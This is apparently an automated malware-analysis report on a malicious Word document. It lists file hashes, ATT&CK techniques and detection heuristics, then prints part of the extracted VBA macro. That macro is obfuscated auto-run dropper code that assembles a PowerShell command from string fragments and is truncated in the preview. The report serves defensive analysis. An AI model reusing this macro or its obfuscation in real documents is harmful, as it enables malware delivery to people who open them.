Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 70f57e2a718c7ef0…

MALICIOUS

Office (OLE)

Size: 149.2 KB | Created: 2018-06-22 11:38:00 | Authoring application: Microsoft Office Word | First seen: 2018-07-14
MD5: 3b7044b040ece1c0457e1a74dec5d8b1
SHA-1: 4dac23f2c518ad61d57acb28fb407a24dd7337c0
SHA-256: 70f57e2a718c7ef0df5b1b7df0cebf9a7aa65e67f1d6636e816780a8439fe045
Risk Score: 242

Malware Insights

MITRE ATT&CK
T1059.005 (Visual Basic); T1204.002 (Malicious File); T1566.001 (Spearphishing Attachment)

The sample is a malicious Office document containing a VBA macro. The macro calls the Shell() function, which fires a critical heuristic because it indicates an attempt to execute external commands. This is further supported by the ClamAV detection name 'Doc.Dropper.Agent-6586649-0', which points to dropper functionality. The presence of an AutoOpen macro indicates that the code executes automatically when the document is opened.

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-6585607-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-6585607-0
  • VBA macros detected [medium; 3 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA [critical] (OLE_VBA_SHELL)
    Shell() call in VBA
  • AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection: see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas | Kind: vba-macro | Source: oletools.olevba.extract_macros (decoded VBA source) | Size: 29096 bytes
SHA-256: 7b3e51a4c03abeb2cbd206ed78ff3ea165efefc910ce3965ba15c72ad908c06a
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "iWFMvNizNOw"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "HmCNbzNhIiW"
Function qAHwXkaRw()
On Error Resume Next
pwXJGz = (zRQCj * 74759 + 18002 * CInt(XqWbpl - CDbl(8601)) * 63195 * Oct(7362))
CwioM = "Hel" + "l  " + ".(" + " $" + "veR" + "bo" + "SE"
CClRKL = (MMRCLc * 5034 + 57278 * CInt(JTzvk - CDbl(37345)) * 23569 * Oct(44913))
ENlqEBiIw = "pr" + "EF" + "er" + "eN"
ZKnlsk = (TYDzo * 66552 + 13824 * CInt(FXZrt - CDbl(22267)) * 26245 * Oct(39199))
sUkbTR = "Ce." + "tO" + "sTR"
cckjIA = (qNlkAJ * 50919 + 38992 * CInt(krDwjZ - CDbl(51941)) * 24348 * Oct(83927))
SPXzAPIl = "inG" + "()" + "[1," + "3]+"
qAHwXkaRw = CwioM + ENlqEBiIw + sUkbTR + SPXzAPIl
NtUdUM = (pJQzhL * 47611 + 39353 * CInt(awWEv - CDbl(94459)) * 10823 * Oct(21158))
End Function
Function OknAlmWFT()
On Error Resume Next
TJVRD = (XsRmp * 42554 + 68655 * CInt(XKTRD - CDbl(63272)) * 6392 * Oct(62094))
MfmJiLHVvrJ = "'x" + "'-" + "jOI" + "n'" + "')(" + " [" + "st"
iawipm = (QnJVAC * 40141 + 47523 * CInt(Ocptl - CDbl(59102)) * 70156 * Oct(82232))
NsEmWXSqjXr = "RI" + "ng" + "]:"
wucjBi = (nfrrE * 44654 + 65963 * CInt(XWBMO - CDbl(33351)) * 41892 * Oct(79393))
NzlBR = ":J" + "Oin" + "( '" + "' " + ", (" + " '3"
KoENmt = (pHwqsS * 69191 + 73467 * CInt(QNXdhB - CDbl(84168)) * 87907 * Oct(69196))
LrjwdKTsdsz = "7M9" + "8s6" + "6U" + "99"
PcXcN = (FhVMZr * 1630 + 73146 * CInt(BwYrNE - CDbl(74661)) * 30070 * Oct(64376))
PvZkfV = "P10" + "9k" + "96s" + "33" + "M6" + "0_3"
EwLNJz = (dPdWR * 60033 + 71467 * CInt(mlOZG - CDbl(48707)) * 23408 * Oct(71377))
zOCHzFH = "3t" + "11" + "1e" + "100" + "e1" + "18M" + "44_"
OknAlmWFT = MfmJiLHVvrJ + NsEmWXSqjXr + NzlBR + LrjwdKTsdsz + PvZkfV + zOCHzFH
jETCWS = (NqfJit * 37971 + 22353 * CInt(ONkIU - CDbl(68540)) * 33935 * Oct(75150))
End Function
Function RuUhMFatIX()
On Error Resume Next
aSYqbY = (NYhFdJ * 14043 + 95555 * CInt(JbAbi - CDbl(85932)) * 34447 * Oct(6128))
IwAiqcjph = "110" + "k9" + "9U" + "10" + "7s" + "10" + "0s9"
sMbdS = (mjXvzE * 44400 + 28557 * CInt(RRVmG - CDbl(72897)) * 9507 * Oct(11449))
hibCVnVA = "8e" + "117" + "_3" + "3s1" + "15" + "e96" + "_1"
GKIRLv = (AUjjMQ * 70158 + 13321 * CInt(SzlLwz - CDbl(73980)) * 24534 * Oct(87304))
fCpzrWwFUS = "11M" + "10" + "1_1" + "10k" + "10" + "8t5"
RXfwX = (GnWHoV * 40473 + 55086 * CInt(wjqfu - CDbl(758)) * 62661 * Oct(27154))
GOPfL = "8k" + "37_" + "87>" + "71"
ooTup = (YvYBd * 19943 + 41359 * CInt(IwGcN - CDbl(99744)) * 92795 * Oct(93817))
lmYrRFBD = "U1" + "16" + "U7" + "0M" + "96M"
IzzOvh = (JlJdIj * 37159 + 22196 * CInt(NitzTz - CDbl(6846)) * 55878 * Oct(21484))
PIVjA = "33t" + "60" + "_33" + "P1" + "11c"
joXSOF = (MLzpuc * 26928 + 48556 * CInt(sArQYc - CDbl(89496)) * 57803 * Oct(186))
jrcHRcV = "10" + "0s1" + "18" + "t44" + ">1"
RuUhMFatIX = IwAiqcjph + hibCVnVA + fCpzrWwFUS + GOPfL + lmYrRFBD + PIVjA + jrcHRcV
DzIJt = (CNwKm * 35547 + 90911 * CInt(QWIOJ - CDbl(36313)) * 11064 * Oct(59941))
End Function
Function HXqoFjPtPRH()
On Error Resume Next
cGClv = (GttSw * 4830 + 84895 * CInt(BDSrP - CDbl(30599)) * 28671 * Oct(8793))
vTOqz = "10P" + "99e" + "10" + "7_"
FUzCU = (UhLXbf * 4594 + 83020 * CInt(HDrQtz - CDbl(96758)) * 41178 * Oct(47001))
CWJdjIf = "10" + "0P9" + "8t1" + "17P" + "33" + "t8"
GLqaq = (JYhzQ * 91721 + 14054 * CInt(NYlliQ - CDbl(48129)) * 99073 * Oct(23258))
IufhKwiscQj = "2U" + "120" + "M1"
kMYwLZ = (wbjOV * 56582 + 12105 * CInt(ISHVu - CDbl(39614)) * 23196 * Oct(92836))
npjoC = "14" + "P11" + "7M" + "10" + "0P"
CUOMq = (tGzJq * 57556 + 83098 * CInt(MHpSU - CDbl(45111)) * 43510 * Oct(86148))
YInRvC = "10" + "8t4" + "7c" + "79c" + "100" + "k11"
HXqoFjPtPRH = vTOqz + CWJdjIf + IufhKwiscQj + npjoC + YInRvC
fPVwRi = (MYPRv * 82800 + 22212 * CInt(HTqIVT - CDbl(29959)) * 83779 * Oct(33558))
End Function
Function lkKsdIBWO()
On Error Resume Next
uNECr
... (truncated)